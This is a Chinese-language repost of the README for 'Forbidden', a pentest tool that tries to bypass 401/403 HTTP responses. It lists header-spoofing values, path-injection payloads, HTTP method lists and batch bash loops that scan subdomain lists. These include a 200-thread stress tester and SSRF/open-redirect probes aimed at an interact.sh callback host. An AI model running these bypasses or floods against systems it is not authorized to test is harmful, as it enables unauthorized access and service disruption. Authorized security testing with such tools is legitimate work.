基于PycURL绕过4xx HTTP响应码——forbidden

作者:Sec-Labs | 发布时间:

项目介绍

基于PycURL绕过4xx HTTP响应状态代码。

脚本使用多线程,并基于暴力强迫,所以可能会有一些假阳性结果。脚本有彩色的输出。

结果将按照HTTP响应状态代码升序、内容长度降序和ID升序进行排序。

要手动过滤掉误报结果,对于每个唯一的内容长度,运行提供的 cURL 命令并检查响应。 如果不导致绕过,则忽略所有内容长度相同的结果。

测试 范围
HTTP methods - w/ both HTTP and HTTPS requests, and 'Content-Length: 0' header methods
Cross-site tracing (XST) with HTTP TRACE and TRACK methods methods
[Text] file upload with HTTP PUT method methods
HTTP method overrides - w/ HTTP headers, and URL parameters method-overrides
URL scheme overrides scheme-overrides
Port overrides port-overrides
Information disclosure with 'Accept' header headers
HTTP headers headers
URL overrides - w/ accessible path, and double 'Host' header headers
URL path bypasses paths
URL transformations and encodings encodings
Basic and bearer authentication - w/ null session, and invalid tokens auths
Open redirects and server-side request forgery (SSRF) - HTTP headers only redirects
Broken URL parsers parsers

请看这里的压力测试脚本。受到这个写法的启发。

根据你的喜好扩展这些脚本。

HTTP头文件的良好来源。

在Kali Linux v2022.2(64位)上测试。

为教育目的而制作。我希望它能对你有所帮助!

 

备注

  • 有些网站可能需要一个有效的/特定的用户代理HTTP请求头。
  • 一些网络代理可能会修改一些HTTP请求(例如,编码范围内的请求)。
  • 注意速率限制和其他类似的保护措施,在同一域名上再次运行该脚本之前需要一些时间。
  • 连接超时被设置为90秒,响应超时被设置为180秒。
  • 所有测试在单线程上的平均运行时间为12分钟;最佳线程数为5。
  • 结果中的长度属性只包括HTTP响应体的长度。
  • 跨站追踪(XST)不再被认为是一个漏洞。
  • 测试双主机头的cURL命令不能正常工作,因为cURL不允许这样做,我不得不使用request库发送HTTP请求。

 

高优先级计划

  • 更多的路径绕过
  • 增加单线程请求之间的等待/睡眠选项。
  • 测试范围只限于允许的HTTP方法(用HTTP OPTIONS方法获取)。
  • 不忽略URL参数和片段。
  • 增加忽略多个文本的选项。

低优先级计划。

  • 支持Log4j
  • 增加表格输出,使结果更具可读性,占用更少的空间。
  • 增加选项来测试域/子域列表中的自定义HTTP头值对。

 

如何运行

从/src/打开你喜欢的控制台,运行下面的命令。

安装所需的工具

apt-get install -y curl

安装所需的软件包

pip3 install -r requirements.txt

运行该脚本

python3 forbidden.py

 

自动化

绕过403 Forbidden HTTP响应状态代码。

count=0; for subdomain in $(cat subdomains_403.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t methods,method-overrides,scheme-overrides,port-overrides,headers,paths,encodings -f GET -l base,path -o "forbidden_403_results_${count}.json"; done

用压力测试绕过403 Forbidden HTTP响应状态代码

count=0; for subdomain in $(cat subdomains_403.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 stresser.py -u "${subdomain}" -dir "stresser_403_results_${count}" -r 1000 -th 200 -f GET -l base -o "stresser_403_results_${count}.json"; done

绕过401未经授权的HTTP响应状态代码

count=0; for subdomain in $(cat subdomains_401.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t auths -f GET -l base -o "forbidden_401_results_${count}.json"; done

扫描开放式重定向和服务器端请求伪造(SSRF)

count=0; for subdomain in $(cat subdomains_live_long.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t redirects -f GET -l base -e xyz.interact.sh -o "forbidden_redirect_results_${count}.json"; done

扫描损坏的 URL 解析器

count=0; for subdomain in $(cat subdomains_live_long.txt); do count=$((count+1)); echo "#${count} | ${subdomain}"; python3 forbidden.py -u "${subdomain}" -t parsers -f GET -l base -e xyz.interact.sh -o "forbidden_parser_results_${count}.json"; done

 

HTTP方法

ACL
ARBITRARY
BASELINE-CONTROL
BIND
CHECKIN
CHECKOUT
CONNECT
COPY
GET
HEAD
INDEX
LABEL
LINK
LOCK
MERGE
MKACTIVITY
MKCALENDAR
MKCOL
MKREDIRECTREF
MKWORKSPACE
MOVE
OPTIONS
ORDERPATCH
PATCH
POST
PRI
PROPFIND
PROPPATCH
PUT
REBIND
REPORT
SEARCH
SHOWMETHOD
SPACEJUMP
TEXTSEARCH
TRACE
TRACK
UNBIND
UNCHECKOUT
UNLINK
UNLOCK
UPDATE
UPDATEREDIRECTREF
VERSION-CONTROL

HTTP头

Method overrides:

X-HTTP-Method
X-HTTP-Method-Override
X-Method-Override

Scheme overrides:

Front-End-HTTPS
X-Forwarded-Proto
X-Forwarded-Protocol
X-Forwarded-Scheme
X-Forwarded-SSL
X-URL-Scheme
X-URLSCHEME

Port overrides:

X-Forwarded-Port

Default:

Base-URL
CF-Connecting-IP
Client-IP
Cluster-Client-IP
Connection
Contact
Destination
Forwarded
Forwarded-For
Forwarded-For-IP
From
Host
Origin
Profile
Proxy
Redirect
Referer
Request-URI
Stuff
True-Client-IP
URI
URL
X-Client-IP
X-Custom-IP-Authorization
X-Forward
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Server
X-Forward-For
X-Host
X-Host-Override
X-HTTP-DestinationURL
X-HTTP-Host-Override
X-Originally-Forwarded-For
X-Original-Remote-Addr
X-Original-URL
X-Originating-IP
X-Override-URL
X-Proxy-URL
X-ProxyUser-IP
X-Real-IP
X-Referer
X-Remote-Addr
X-Remote-IP
X-Rewrite-URL
X-Server-IP
X-Wap-Profile

URL路径

在URL路径的开头、结尾以及开头和结尾都注入。所有的组合。

/
//
%09
%20
%23
%2e
*
.
..
;
.;
..;
;foo=bar;

在URL路径的末端注入。

#
##
##random
*
**
**random
.
..
..random
?
??
??random
~
~~
~~random

在URL路径的末尾注入,但只有当URL路径不以'/'结尾时才注入。

.asp
.aspx
.esp
.html
.jhtml
.json
.jsp
.jspa
.jspx
.php
.sht
.shtml
.xhtml

结果格式

[
   {
      "id":"559-HEADERS-2",
      "url":"https://example.com:443/admin",
      "method":"GET",
      "headers":[
         "Host: 127.0.0.1"
      ],
      "body":null,
      "agent":"Forbidden/7.8",
      "command":"curl --connect-timeout 90 -m 180 -iskL --max-redirs 10 --path-as-is -H 'Host: 127.0.0.1' -H 'User-Agent: Forbidden/7.8' -X 'GET' 'https://example.com:443/admin'",
      "code":200,
      "length":255408
   },
   {
      "id":"560-HEADERS-2",
      "url":"https://example.com:443/admin",
      "method":"GET",
      "headers":[
         "Host: 127.0.0.1:443"
      ],
      "body":null,
      "agent":"Forbidden/7.8",
      "command":"curl --connect-timeout 90 -m 180 -iskL --max-redirs 10 --path-as-is -H 'Host: 127.0.0.1:443' -H 'User-Agent: Forbidden/7.8' -X 'GET' 'https://example.com:443/admin'",
      "code":200,
      "length":255408
   }
]

使用方法

forbidden.py

Forbidden v7.8 ( github.com/ivan-sincek/forbidden )

Usage:   python3 forbidden.py -u url                       -t tests [-f force] [-v values    ] [-p path            ] [-o out         ]
Example: python3 forbidden.py -u https://example.com/admin -t all   [-f GET  ] [-v values.txt] [-p /home/index.html] [-o results.json]

DESCRIPTION
    Bypass 4xx HTTP response status codes and more
URL
    Inaccessible or forbidden URL
    Parameters and fragments are ignored
    -u <url> - https://example.com/admin | etc.
TESTS
    Tests to run
    Use comma separated values
    -t <tests> - methods | [method|scheme|port]-overrides | headers | paths | encodings | auths | redirects | parsers | all
FORCE
    Force an HTTP method for nonspecific test cases
    -f <force> - GET | POST | CUSTOM | etc.
VALUES
    File with additional HTTP header values such as internal IPs, etc.
    Spacing will be stripped, empty lines ignored, and duplicates removed
    Scope: headers
    -v <values> - values.txt | etc.
PATH
    Accessible URL path to test URL overrides
    Scope: headers
    Default: /robots.txt
    -p <path> - /home/index.html | /README.txt | etc.
EVIL
    Specify (strictly) evil domain name with no port to test URL overrides
    Scope: headers | redirects
    Default: github.com
    -e <evil> - xyz.interact.sh | xyz.burpcollaborator.net | etc.
IGNORE
    Filter out 200 OK false positive results by text
    Spacing will be stripped
    -i <ignore> - Forbidden | "Access Denied" | etc.
LENGTHS
    Filter out 200 OK false positive results by content lengths
    Specify 'base' to ignore content length of base HTTP response
    Specify 'path' to ignore content length of accessible URL response
    Use comma separated values
    -l <lengths> - 12 | base | path | etc.
THREADS
    Number of parallel threads to run
    More threads make it quicker but can give worse results
    Heavily depends on network bandwidth and server capacity
    Default: 5
    -th <threads> - 200 | etc.
AGENT
    User agent to use
    Default: Forbidden/7.8
    -a <agent> - curl/3.30.1 | etc.
PROXY
    Web proxy to use
    -x <proxy> - 127.0.0.1:8080 | etc.
OUT
    Output file
    -o <out> - results.json | etc.

stresser.py

Stresser v2.8 ( github.com/ivan-sincek/forbidden )

Usage:   python3 stresser.py -u url                        -dir directory -r repeat -th threads [-f force] [-o out         ]
Example: python3 stresser.py -u https://example.com/secret -dir results   -r 1000   -th 200     [-f GET  ] [-o results.json]

DESCRIPTION
    Bypass 4xx HTTP response status codes with stress testing
URL
    Inaccessible or forbidden URL
    Parameters and fragments are ignored
    -u <url> - https://example.com/secret | etc.
DIRECTORY
    Output directory
    All valid and unique HTTP responses will be saved in this directory
    -dir <directory> - results | etc.
REPEAT
    Number of HTTP requests to send for each test case
    -r <repeat> - 1000 | etc.
THREADS
    Number of parallel threads to run
    -th <threads> - 200 | etc.
FORCE
    Force an HTTP method for nonspecific test cases
    -f <force> - GET | POST | CUSTOM | etc.
IGNORE
    Filter out 200 OK false positive results by text
    Spacing will be stripped
    -i <ignore> - Forbidden | "Access Denied" | etc.
LENGTHS
    Filter out 200 OK false positive results by content lengths
    Specify 'base' to ignore content length of base HTTP response
    Use comma separated values
    -l <lengths> - 12 | base | etc.
AGENT
    User agent to use
    Default: Stresser/2.8
    -a <agent> - curl/3.30.1 | etc.
PROXY
    Web proxy to use
    -x <proxy> - 127.0.0.1:8080 | etc.
OUT
    Output file
    -o <out> - results.json | etc.

 

项目地址

https://github.com/ivan-sincek/forbidden

标签:工具分享